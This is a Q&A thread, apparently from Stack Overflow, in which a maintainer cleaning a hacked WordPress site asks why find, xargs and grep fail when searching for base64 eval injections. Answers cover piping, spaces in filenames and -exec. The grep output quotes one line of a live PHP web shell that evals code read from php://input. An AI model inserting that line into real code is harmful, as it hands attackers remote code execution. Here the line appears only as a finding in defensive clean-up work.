# Shell find complaining about paths

Tags: shell

I am following this guide : https://raamdev.com/2013/cleaning-evalbase64_decode-from-a-hacked-wordpress-website-via-ssh/ to deal with a pharma hack on a site I maintain.

I'm relatively new to shell commands and I'm having some issues with the find command.

This command: `find . -type f xargs grep 'eval(base64_encode'` returns the error

```
find: paths must precede expression: xargs
Usage: find [-H] [-L] [-P] [-Olevel] [-D help|tree|search|stat|rates|opt|exec] [path...] [expression]
```

All the threads that I've located so far are resolved by using single or double quotes, but I've tried both and had no results.

Can anyone tell me what I'm doing wrong?

**edit:**

I immediately realised I was missing a pipe.
However my new problem is that I'm not getting the response I was expecting.

Can someone help interperate this?

```
grep: ./uploads/2012/05/Screen: No such file or directory
grep: Shot: No such file or directory
grep: 2012-05-31: No such file or directory
grep: at: No such file or directory
grep: 13.21.55.png: No such file or directory
grep: ./themes/twentyeleven/footer: No such file or directory
grep: copy.php: No such file or directory
./themes/ocularprofessor/images/in.php:         exit(eval(base64_decode(file_get_contents('php                               ://input'))));
```

I was expecting a list of possibly infected files!

Comment: Simply type all the characters you find in your guide. You left out an `|` before xargs, for example.

Comment: You have space characters inside filenames. Try find ... -print0|xargs -0 ...

Answer (score 0):

Try this:

```
find . -type f -exec grep 'eval(base64_encode' {} \;
```

The original find passed the entire list of files to xargs which is then supposed to run grep over each one which looks for the string.

My version runs grep each time a file is found.  -type f means only output filenames and not directories, which makes sense because you can't run grep on a directory - its just a container.  The {} bit is replaced by the file from the find and the \; bit is to terminate the exec (I wont bore you with the full details!)

The only other things that might be going wrong is that you did not cd to the directory containing your content, in which case replace the . with the full path to where to start from.

You can break this down by simple running:

```
find . -type f
```

which should spit out a list of the file names you want to check.

Comment: I am concerned by the -exec flag, what does it do?